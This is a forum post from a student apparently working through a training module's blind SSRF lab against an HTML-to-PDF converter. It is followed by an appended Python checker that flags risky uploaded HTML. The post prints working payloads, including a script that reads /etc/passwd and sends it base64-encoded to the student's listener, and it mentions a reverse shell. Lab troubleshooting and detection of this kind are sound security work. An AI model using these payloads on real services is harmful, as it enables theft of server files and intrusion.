I’m completely stuck in the middle of the Blind SSRF Exploitation Example section of Server-Side Attacks. I’m at the part where I’m uploading HTML content to the PDF converter. The following payloads do work:
<!DOCTYPE html>
<html>
<body>
<a>Hello World!</a>
<img src="http://10.10.15.170:9090/x?=viaimgtag">
</body>
</html>
This hits my server with:
10.129.227.153 - - [04/Feb/2023 14:06:59] "GET /x?=viaimgtag HTTP/1.1" 404 -
So far so good. Now I add some JavaScript:
<script>
var exfil = new XMLHttpRequest(); // Send the file to our server
var url = 'http://10.10.15.170:9090/?data=test123';
exfil.open("GET", url, true);
exfil.send();
</script>
This hits my server with:
10.129.227.153 - - [04/Feb/2023 14:35:12] "GET /?data=test123 HTTP/1.1" 200 -
as expected.
But when I try and upload the following example code, which is taken directly from the module section, and only modified with my IP address and port (the same IP address and port I’m using in the above examples), I never get a request to my server, and I never get a response from the server for my POST request.
<html>
<body>
<b>Exfiltration via Blind SSRF</b>
<script>
var readfile = new XMLHttpRequest(); // Read the local file
var exfil = new XMLHttpRequest(); // Send the file to our server
readfile.open("GET","file:///etc/passwd", true);
readfile.send();
readfile.onload = function() {
    if (readfile.readyState === 4) {
        var url = 'http://10.10.15.170:9090/?data='+btoa(this.response);
        exfil.open("GET", url, true);
        exfil.send();
    }
}
readfile.onerror = function(){document.write('<a>Oops!</a>');}
</script>
</body>
</html>
I get the same problem when I try and upload my reverse shell code, but I figure I should get this working before I move on to that.
I’ve tried to modify the readfile URL to read localhost:8080, localhost, or some other things, to see if the read is the problem, but I get the same thing every time (no server response, no callback to my server).
I’m running out of ideas. Can anyone think of anything?
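Added example, not part of the original post or the module: seen from the converter operator's side, the uploads above combine a script element, a `file://` read and fetches to a host outside the service, all of which can be flagged before the HTML reaches the renderer. The class and function names, the attribute list and the sample (with a documentation address) are assumptions made for this sketch.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_ATTRS = {"src", "href", "data", "action", "poster"}  # assumed, not exhaustive
URL_IN_TEXT = re.compile(r"(?i)\b(?:file|https?)://[^\s'\"<>)]+")
# Constructed sample (documentation address), shaped like the uploads in the post.
SAMPLE = ('<img src="http://192.0.2.10:9090/x">\n<script>\n'
          'var r = new XMLHttpRequest(); r.open("GET", "file:///etc/passwd", true);\n</script>')

class UploadAudit(HTMLParser):
    """Hypothetical pre-render check for HTML sent to an HTML-to-PDF converter."""
    def __init__(self, allowed_hosts=()):
        super().__init__()
        self.allowed_hosts = set(allowed_hosts)
        self.findings = []       # (kind, detail) tuples in document order
        self._in_script = False

    def _check_url(self, url):
        try:
            parts = urlsplit(url.strip())
        except ValueError:       # e.g. malformed bracketed host
            self.findings.append(("unparseable-url", url))
            return
        if parts.scheme.lower() == "file":
            self.findings.append(("local-file-url", url))
        elif parts.netloc and parts.hostname not in self.allowed_hosts:
            self.findings.append(("external-fetch", parts.hostname))

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.findings.append(("script-element", "line %d" % self.getpos()[0]))
        for name, value in attrs:
            if name.startswith("on"):            # inline handlers also run script
                self.findings.append(("event-handler", name))
            elif name in URL_ATTRS and value:
                self._check_url(value)
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:      # script bodies arrive here as raw text
            for match in URL_IN_TEXT.finditer(data):
                self._check_url(match.group(0))

def audit_upload(html, allowed_hosts=()):
    parser = UploadAudit(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings
```

A check like this only reports what is visible in the markup; rendering with script execution, local file access and outbound network access disabled is what removes the behaviour itself.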